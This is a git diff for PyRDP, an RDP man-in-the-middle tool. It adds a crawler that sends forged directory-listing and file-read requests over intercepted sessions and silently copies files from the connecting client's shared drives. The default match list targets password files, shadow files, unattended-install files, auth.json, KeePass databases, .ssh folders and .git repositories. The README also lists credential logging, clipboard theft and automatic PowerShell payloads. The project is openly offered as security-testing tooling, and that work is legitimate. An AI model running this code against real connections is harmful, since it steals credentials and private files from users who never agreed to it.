diff --git a/CHANGELOG.adoc b/CHANGELOG.adoc index b9fb78d84..3d8db08bb 100644 --- a/CHANGELOG.adoc +++ b/CHANGELOG.adoc @@ -11,6 +11,7 @@ For a detailed view of what has changed, refer to the {uri-repo}/commits/master[ === Enhancements * Add recursive folder download from the PyRDP Player and a queue to download files ({uri-issue}140[#140]) +* Add file crawler to automatically download files from the client drive using pattern files ({uri-issue}141[#141]) === Bug fixes diff --git a/README.md b/README.md index 3fc0f8231..e96231d8d 100644 --- a/README.md +++ b/README.md @@ -6,8 +6,9 @@ It features a few tools: - Logs credentials used when connecting - Steals data copied to the clipboard - Saves a copy of the files transferred over the network + - Crawls shared drives in the background and saves them locally - Saves replays of connections so you can look at them later - - Run console commands or PowerShell payloads automatically on new connections + - Runs console commands or PowerShell payloads automatically on new connections - RDP Player: - See live RDP connections coming from the MITM - View replays of RDP connections diff --git a/bin/pyrdp-mitm.py b/bin/pyrdp-mitm.py index 3599ba46d..8f8a83a36 100755 --- a/bin/pyrdp-mitm.py +++ b/bin/pyrdp-mitm.py @@ -46,9 +46,16 @@ def __init__(self, config: MITMConfig): def buildProtocol(self, addr): sessionID = f"{names.get_first_name()}{random.randrange(100000,999999)}" - logger = logging.getLogger(LOGGER_NAMES.MITM_CONNECTIONS) - logger = SessionLogger(logger, sessionID) - mitm = RDPMITM(logger, self.config) + + # mainLogger logs in a file and stdout + mainlogger = logging.getLogger(LOGGER_NAMES.MITM_CONNECTIONS) + mainlogger = SessionLogger(mainlogger, sessionID) + + # crawler logger only logs to a file for analysis purposes + crawlerLogger = logging.getLogger(LOGGER_NAMES.CRAWLER) + crawlerLogger = SessionLogger(crawlerLogger, sessionID) + + mitm = RDPMITM(mainlogger, crawlerLogger, self.config) return mitm.getProtocol() @@ -87,6 +94,21 @@ def prepareLoggers(logLevel: int, logFilter: str, sensorID: str, outDir: Path): connectionsLogger = logging.getLogger(LOGGER_NAMES.MITM_CONNECTIONS) connectionsLogger.addHandler(jsonFileHandler) + crawlerFormatter = VariableFormatter("[{asctime}] - {sessionID} - {message}", style = "{", defaultVariables = { + "sessionID": "GLOBAL" + }) + + crawlerFileHandler = logging.FileHandler(logDir / "crawl.log") + crawlerFileHandler.setFormatter(crawlerFormatter) + + jsonCrawlerFileHandler = logging.FileHandler(logDir / "crawl.json") + jsonCrawlerFileHandler.setFormatter(JSONFormatter({"sensor": sensorID})) + + crawlerLogger = logging.getLogger(LOGGER_NAMES.CRAWLER) + crawlerLogger.addHandler(crawlerFileHandler) + crawlerLogger.addHandler(jsonCrawlerFileHandler) + crawlerLogger.setLevel(logging.INFO) + log.prepareSSLLogger(logDir / "ssl.log") @@ -169,6 +191,9 @@ def main(): parser.add_argument("--payload-powershell-file", help="PowerShell script to run automatically upon connection (as -EncodedCommand)", default=None) parser.add_argument("--payload-delay", help="Time to wait after a new connection before sending the payload, in milliseconds", default=None) parser.add_argument("--payload-duration", help="Amount of time for which input / output should be dropped, in milliseconds. This can be used to hide the payload screen.", default=None) + parser.add_argument("--crawl", help="Enable automatic shared drive scraping", action="store_true") + parser.add_argument("--crawler-match-file", help="File to be used by the crawler to chose what to download when scraping the client shared drives.", default=None) + parser.add_argument("--crawler-ignore-file", help="File to be used by the crawler to chose what folders to avoid when scraping the client shared drives.", default=None) parser.add_argument("--no-replay", help="Disable replay recording", action="store_true") args = parser.parse_args() @@ -210,6 +235,9 @@ def main(): config.replacementUsername = args.username config.replacementPassword = args.password config.outDir = outDir + config.enableCrawler = args.crawl + config.crawlerMatchFileName = args.crawler_match_file + config.crawlerIgnoreFileName = args.crawler_ignore_file config.recordReplays = not args.no_replay diff --git a/pyrdp/logging/adapters.py b/pyrdp/logging/adapters.py index b1c49d5ee..71e3fc24c 100644 --- a/pyrdp/logging/adapters.py +++ b/pyrdp/logging/adapters.py @@ -19,6 +19,7 @@ def __init__(self, logger: logging.Logger, sessionID: str): :param sessionID: session ID value. """ super().__init__(logger, {"sessionID": sessionID}) + self.sessionID = sessionID def createChild(self, childName: str, sessionID: str = None) -> 'SessionLogger': """ diff --git a/pyrdp/logging/log.py b/pyrdp/logging/log.py index 885c8b51a..52264bb26 100644 --- a/pyrdp/logging/log.py +++ b/pyrdp/logging/log.py @@ -11,12 +11,15 @@ class LOGGER_NAMES: + # Root logger PYRDP = "pyrdp" MITM = f"{PYRDP}.mitm" MITM_CONNECTIONS = f"{MITM}.connections" PLAYER = f"{PYRDP}.player" PLAYER_UI = f"{PLAYER}.ui" + # Independent logger + CRAWLER = "crawler" def getSSLLogger(): """ @@ -24,7 +27,6 @@ def getSSLLogger(): """ return logging.getLogger("ssl") - def prepareSSLLogger(path: Path): """ Prepares the SSL master secret logger. @@ -45,7 +47,6 @@ def prepareSSLLogger(path: Path): logger.addHandler(streamHandler) logger.setLevel(logging.INFO) - def info(*args): logging.getLogger(LOGGER_NAMES.PYRDP).info(*args) diff --git a/pyrdp/mitm/FileCrawlerMITM.py b/pyrdp/mitm/FileCrawlerMITM.py new file mode 100644 index 000000000..656287a60 --- /dev/null +++ b/pyrdp/mitm/FileCrawlerMITM.py @@ -0,0 +1,314 @@ +# +# This file is part of the PyRDP project. +# Copyright (C) 2019 GoSecure Inc. +# Licensed under the GPLv3 or later. +# +from collections import defaultdict +from logging import LoggerAdapter +from pathlib import Path +from typing import BinaryIO, Dict, List, Optional, Set + +from pyrdp.enum.virtual_channel.device_redirection import DeviceType +from pyrdp.mitm.config import MITMConfig +from pyrdp.mitm.DeviceRedirectionMITM import DeviceRedirectionMITM, DeviceRedirectionMITMObserver +from pyrdp.mitm.state import RDPMITMState +from pyrdp.pdu import DeviceAnnounce + +import fnmatch + +class VirtualFile: + """ + Component used to simplify syntax and wrap common file and directory attributes + """ + def __init__(self, deviceID: int, name: str, filePath: str, isDirectory: bool): + """ + :param deviceID: ID of the device used. + :param filePath: Unix-style path of the file. + :param isDirectory: True if the file is a directory. + """ + + self.deviceID = deviceID + self.name = name + self.path = filePath + self.isDirectory = isDirectory + +class FileCrawlerMITM(DeviceRedirectionMITMObserver): + """ + Component used to automatically crawl each shared drives based on user-configurable patterns. + For each shared drives, we start by listing the root directory. + + When listing a directory, we queue up files and directory in different queues. If they matched a "match pattern", + files go into the file download queue (matchedFileQueue), + directories go in another download queue to be recursively downloaded (downloadDirectories), + and unmatched directories goes in the unvisitedDirectory, to be crawled later. + + Directories matching an "ignore pattern" won't be added to the unvisitedDirectory queue. + + When listing a directory from downloadDirectories, each of the result are automatically + flagged for download and put in the appropriate download queue. + + When done downloading files and directories, we do the same process for every unvisited directory in the unvisitedDirectory queue. + """ + + def __init__(self, mainLogger: LoggerAdapter, fileLogger: LoggerAdapter, config: MITMConfig, state: RDPMITMState): + super().__init__() + + self.log = mainLogger + self.fileLogger = fileLogger + self.state = state + self.config = config + self.devices: Dict[int, VirtualFile] = {} + self.deviceRedirection: Optional[DeviceRedirectionMITM] = None + + # Pending crawler requests + self.fileDownloadRequests: Dict[int, Path] = {} + self.directoryListingRequests: Dict[int, Path] = {} + self.directoryListingLists = defaultdict(list) + + # Download management + self.downloadFiles: Dict[str, BinaryIO] = {} + self.downloadDirectories: Set[int] = set() + + # Crawler detection patterns + self.matchPatterns: List[str] = [] + self.ignorePatterns: List[str] = [] + + # Crawler queues + self.matchedFileQueue: List[VirtualFile] = [] + self.matchedDirectoryQueue: List[VirtualFile] = [] + self.unvisitedDirectory: List[VirtualFile] = [] + self.unvisitedDrive: List[VirtualFile] = [] + + def setDeviceRedirectionComponent(self, deviceRedirection: DeviceRedirectionMITM): + """ + Sets a reference to the class we are currently observing. Can only observe one class. + If uninitialized, load the patterns from the pattern files. + :param deviceRedirection: Reference to the observed class. + """ + if self.deviceRedirection: + self.deviceRedirection.removeObserver(self) + + if deviceRedirection: + deviceRedirection.addObserver(self) + + self.deviceRedirection = deviceRedirection + if not self.matchPatterns and not self.ignorePatterns: + self.preparePatterns() + + def preparePatterns(self): + """ + Load patterns from either the default match files or the user-configured files. + Should only be called once. + """ + + matchPath = None + ignorePath = None + + # Get the default file in pyrdp/mitm/crawler_config + if self.config.crawlerMatchFileName: + matchPath = Path(self.config.crawlerMatchFileName).absolute() + else: + matchPath = Path(__file__).parent.absolute() / "crawler_config" / "match.txt" + + if self.config.crawlerIgnoreFileName: + ignorePath = Path(self.config.crawlerIgnoreFileName).absolute() + else: + ignorePath = Path(__file__).parent.absolute() / "crawler_config" / "ignore.txt" + + self.log.debug("Using match pattern file %(matchPath)s", {"matchPath": matchPath}) + self.matchPatterns = self.parsePatterns(matchPath) + + self.log.debug("Using ignore pattern file %(ignorePath)s", {"ignorePath": ignorePath}) + self.ignorePatterns = self.parsePatterns(ignorePath) + + def parsePatterns(self, path: str) -> List[str]: + patternList = [] + try: + with open(path, "r") as f: + for line in f: + if line and line[0] in ["#", " ", "\n"]: + continue + + patternList.append(line.lower().rstrip()) + except Exception as e: + self.log.exception(e) + self.log.error("Failed to open file %(path)s", {"path": path}) + + return patternList + + def dispatchDownload(self): + """ + Processes each queue in order of priority. + File download have priority over directory download. + Crawl each folder before visiting another drive. + """ + + # Download a queued file + if len(self.matchedFileQueue) != 0: + file = self.matchedFileQueue.pop() + self.downloadFile(file) + + # List a queued directory + elif len(self.matchedDirectoryQueue) != 0: + directory = self.matchedDirectoryQueue.pop() + self.listDirectory(directory.deviceID, directory.path, True) + + # List an unvisited directory + elif len(self.unvisitedDirectory) != 0: + directory = self.unvisitedDirectory.pop() + self.listDirectory(directory.deviceID, directory.path) + + # List an unvisited drive + elif len(self.unvisitedDrive) != 0: + drive = self.unvisitedDrive.pop() + + # TODO : Maybe dump whole drive if there isn't a lot of files? + # Maybe if theres no directory at the root directory -> dump all? + self.log.info("Begin crawling disk %(disk)s", {"disk" : drive.name}) + self.fileLogger.info("Begin crawling disk %(disk)s", {"disk" : drive.name}) + self.listDirectory(drive.deviceID, drive.path) + else: + self.log.info("Done crawling.") + + def addListingToDownloadQueue(self, requestID: int): + directoryList = self.directoryListingLists.pop(requestID, {}) + + for item in directoryList: + if item.name in ["", ".", ".."]: + continue + + if item.isDirectory: + self.matchedDirectoryQueue.append(item) + else: + self.matchedFileQueue.append(item) + self.dispatchDownload() + + def crawlListing(self, requestID: int): + """ + Match files and directories against the configured match and ignore patterns. + :param requestID: The ID of the request containing the directory listing. + """ + + directoryList = self.directoryListingLists.pop(requestID, {}) + + for item in directoryList: + if item.name in ["", ".", ".."]: + continue + + insensitivePath = item.path.lower() + ignore = any(fnmatch.fnmatch(insensitivePath, p) for p in self.ignorePatterns) + if ignore: + continue + + matched = any(fnmatch.fnmatch(insensitivePath, p) for p in self.matchPatterns) + if item.isDirectory: + if matched: + self.log.info("Matched directory %(file)s", {"file" : item.path}) + self.matchedDirectoryQueue.append(item) + else: + self.unvisitedDirectory.append(item) + else: + if matched: + self.matchedFileQueue.append(item) + + self.fileLogger.info("%(file)s - %(isDirectory)s - %(isDownloaded)s", {"file" : item.path, "isDirectory": item.isDirectory, "isDownloaded": matched}) + self.dispatchDownload() + + def downloadFile(self, file: VirtualFile): + remotePath = file.path + basePath = f"{self.config.fileDir}/{self.log.sessionID}" + localPath = f"{basePath}{remotePath}" + + self.log.info("Saving %(remotePath)s to %(localPath)s", {"remotePath": remotePath, "localPath": localPath}) + + try: + # Create parent directory, don't raise error if it already exists + Path(localPath).parent.mkdir(parents=True, exist_ok=True) + targetFile = open(localPath, "wb") + except Exception as e: + self.log.exception(e) + self.log.error("Cannot save file: %(localPath)s", {"localPath": localPath}) + return + + self.downloadFiles[remotePath] = targetFile + self.deviceRedirection.sendForgedFileRead(file.deviceID, remotePath) + + def listDirectory(self, deviceID: int, path: str, download: bool = False): + """ + List the directory + :param deviceID: Drive we are actually listing. + :param path: Path of the directory we are listing. + :param download: Wether or not we need to download this directory. + """ + listingPath = str(Path(path).absolute()).replace("/", "\\") + + if not listingPath.endswith("*"): + if not listingPath.endswith("\\"): + listingPath += "\\" + + listingPath += "*" + + requestID = self.deviceRedirection.sendForgedDirectoryListing(deviceID, listingPath) + + # If the directory is flagged for download, keep trace of the incoming request to trigger download. + if download: + self.downloadDirectories.add(requestID) + + self.directoryListingRequests[requestID] = Path(path).absolute() + + def onDeviceAnnounce(self, device: DeviceAnnounce): + if device.deviceType == DeviceType.RDPDR_DTYP_FILESYSTEM: + + drive = VirtualFile(device.deviceID, device.preferredDOSName, "/", True) + + self.devices[drive.deviceID] = drive + self.unvisitedDrive.append(drive) + + # If the crawler hasn't started, start one instance + if len(self.devices) == 1: + self.dispatchDownload() + + def onFileDownloadResult(self, deviceID: int, requestID: int, path: str, offset: int, data: bytes): + remotePath = path.replace("\\", "/") + + targetFile = self.downloadFiles[remotePath] + targetFile.write(data) + + def onFileDownloadComplete(self, deviceID: int, requestID: int, path: str, errorCode: int): + remotePath = path.replace("\\", "/") + + file = self.downloadFiles.pop(remotePath) + file.close() + + if errorCode != 0: + # TODO : Handle common error codes like : + # 0xc0000022 : Permission error + # Doc : https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/18d8fbe8-a967-4f1c-ae50-99ca8e491d2d + + self.log.error("Error happened when downloading %(remotePath)s. The file may not have been saved completely. Error code: %(errorCode)s", { + "remotePath": remotePath, + "errorCode": "0x%08lx" % errorCode, + }) + + self.dispatchDownload() + + def onDirectoryListingResult(self, deviceID: int, requestID: int, fileName: str, isDirectory: bool): + if requestID not in self.directoryListingRequests: + return + + path = self.directoryListingRequests[requestID] + filePath = path / fileName + + file = VirtualFile(deviceID, fileName, str(filePath), isDirectory) + directoryList = self.directoryListingLists[requestID] + directoryList.append(file) + + def onDirectoryListingComplete(self, deviceID: int, requestID: int): + self.directoryListingRequests.pop(requestID, {}) + + # If directory was flagged for download + if requestID in self.downloadDirectories: + self.downloadDirectories.remove(requestID) + self.addListingToDownloadQueue(requestID) + else: + self.crawlListing(requestID) diff --git a/pyrdp/mitm/RDPMITM.py b/pyrdp/mitm/RDPMITM.py index 2c23f1b52..0f961a894 100644 --- a/pyrdp/mitm/RDPMITM.py +++ b/pyrdp/mitm/RDPMITM.py @@ -24,6 +24,7 @@ from pyrdp.mitm.config import MITMConfig from pyrdp.mitm.DeviceRedirectionMITM import DeviceRedirectionMITM from pyrdp.mitm.FastPathMITM import FastPathMITM +from pyrdp.mitm.FileCrawlerMITM import FileCrawlerMITM from pyrdp.mitm.layerset import RDPLayerSet from pyrdp.mitm.MCSMITM import MCSMITM from pyrdp.mitm.MITMRecorder import MITMRecorder @@ -42,25 +43,25 @@ class RDPMITM: Main MITM class. The job of this class is to orchestrate the components for all the protocols. """ - def __init__(self, log: SessionLogger, config: MITMConfig): + def __init__(self, mainLogger: SessionLogger, crawlerLogger: SessionLogger, config: MITMConfig): """ :param log: base logger to use for the connection :param config: the MITM configuration """ - self.log = log + self.log = mainLogger """Base logger for the connection""" - self.clientLog = log.createChild("client") + self.clientLog = mainLogger.createChild("client") """Base logger for the client side""" - self.serverLog = log.createChild("server") + self.serverLog = mainLogger.createChild("server") """Base logger for the server side""" - self.attackerLog = log.createChild("attacker") + self.attackerLog = mainLogger.createChild("attacker") """Base logger for the attacker side""" - self.rc4Log = log.createChild("rc4") + self.rc4Log = mainLogger.createChild("rc4") """Logger for RC4 secrets""" self.config = config @@ -108,6 +109,8 @@ def __init__(self, log: SessionLogger, config: MITMConfig): self.attacker: AttackerMITM = None + self.crawler: FileCrawlerMITM = None + self.client.x224.addObserver(X224Logger(self.getClientLog("x224"))) self.client.mcs.addObserver(MCSLogger(self.getClientLog("mcs"))) self.client.slowPath.addObserver(SlowPathLogger(self.getClientLog("slowpath"))) @@ -131,6 +134,9 @@ def __init__(self, log: SessionLogger, config: MITMConfig): replayFileName = "rdp_replay_{}_{}.pyrdp".format(date.strftime('%Y%m%d_%H-%M-%S'), date.microsecond // 1000) self.recorder.addTransport(FileLayer(self.config.replayDir / replayFileName)) + if config.enableCrawler: + self.crawler: FileCrawlerMITM = FileCrawlerMITM(self.getClientLog(MCSChannelName.DEVICE_REDIRECTION).createChild("crawler"), crawlerLogger, self.config, self.state) + def getProtocol(self) -> Protocol: """ Get the Protocol expected by Twisted. @@ -299,6 +305,9 @@ def buildDeviceChannel(self, client: MCSServerChannel, server: MCSClientChannel) deviceRedirection = DeviceRedirectionMITM(clientLayer, serverLayer, self.getLog(MCSChannelName.DEVICE_REDIRECTION), self.config, self.statCounter, self.state) self.channelMITMs[client.channelID] = deviceRedirection + if self.config.enableCrawler: + self.crawler.setDeviceRedirectionComponent(deviceRedirection) + if self.attacker: self.attacker.setDeviceRedirectionComponent(deviceRedirection) diff --git a/pyrdp/mitm/config.py b/pyrdp/mitm/config.py index dcb7de314..0d2d5715f 100644 --- a/pyrdp/mitm/config.py +++ b/pyrdp/mitm/config.py @@ -53,6 +53,15 @@ def __init__(self): self.payloadDuration: int = None """Amount of time the payload should take to complete, in milliseconds""" + self.enableCrawler: bool = False + """Whether the crawler should be enabled or not""" + + self.crawlerMatchFileName: str = None + """Path to the crawler match configuration file""" + + self.crawlerIgnoreFileName: str = None + """Path to the crawler ignore configuration file""" + @property def replayDir(self) -> Path: """ diff --git a/pyrdp/mitm/crawler_config/ignore.txt b/pyrdp/mitm/crawler_config/ignore.txt new file mode 100644 index 000000000..7ebe365c2 --- /dev/null +++ b/pyrdp/mitm/crawler_config/ignore.txt @@ -0,0 +1,44 @@ +# Non-interesting / big Windows root folders +/$Recycle.Bin +/Boot +/Recovery +/BGinfo +/PerfLogs + +# Dev packages folders +*/node_modules +*/vendor + +# Default files on Windows +*/AppData/Local/Packages +*/Common Files +*/internet explorer +*/Microsoft* +*/UNP +*/USOShared +*/Windows* + +# Default VM folders +*/Oracle +*/PuppetLabs +*/Puppet Labs + +# Package managers +*/chocolatey + +# Non-interesting / big Linux root folders +/bin +/boot +/dev +/lib +/lib64 +/lost+found +/media +/mnt +/proc +/run +/sbin +/snap +/sys +/tmp +/usr \ No newline at end of file diff --git a/pyrdp/mitm/crawler_config/match.txt b/pyrdp/mitm/crawler_config/match.txt new file mode 100644 index 000000000..38e26e93b --- /dev/null +++ b/pyrdp/mitm/crawler_config/match.txt @@ -0,0 +1,34 @@ +# Common extensions +*/*.txt +*/*.pdf +*/*.csv +*/*.xls +*/*.xlsx +*/*.doc +*/*.docx +*/*.ppt +*/*.pptx + +# Possible malware samples +*/*.bat +*/*.exe +*/*.dll +*/*.ps1 + +# Credentials +*/passwd +*/shadow +*/*unattend.xml +*/*Unattended.xml +*/*auth.json +*/*.kdb +*/*.kdbx + + + + + +# Awesome folders to dump :) +*/.git +*/ssh +*/.ssh \ No newline at end of file diff --git a/pyrdp/player/LiveEventHandler.py b/pyrdp/player/LiveEventHandler.py index 86fa79f45..8635da4b3 100644 --- a/pyrdp/player/LiveEventHandler.py +++ b/pyrdp/player/LiveEventHandler.py @@ -306,7 +306,7 @@ def handleDownloadComplete(self, response: PlayerFileDownloadCompletePDU): if response.error != 0: self.log.error("Error happened when downloading %(remotePath)s. The file may not have been saved completely. Error code: %(errorCode)s", { "remotePath": remotePath, - "errorCode": '0x%08lx' % response.error, + "errorCode": "0x%08lx" % response.error, }) try: diff --git a/setup.py b/setup.py index 66d531d7d..def31d44a 100755 --- a/setup.py +++ b/setup.py @@ -19,6 +19,7 @@ author_email='egg997@gmail.com, flabelle@gosecure.ca', url='https://github.com/GoSecure/pyrdp', packages=setuptools.find_packages(include=["pyrdp", "pyrdp.*"]), + package_data={"pyrdp": ["mitm/crawler_config/*.txt"]}, ext_modules=[Extension('rle', ['ext/rle.c'])], scripts=[ 'bin/pyrdp-clonecert.py',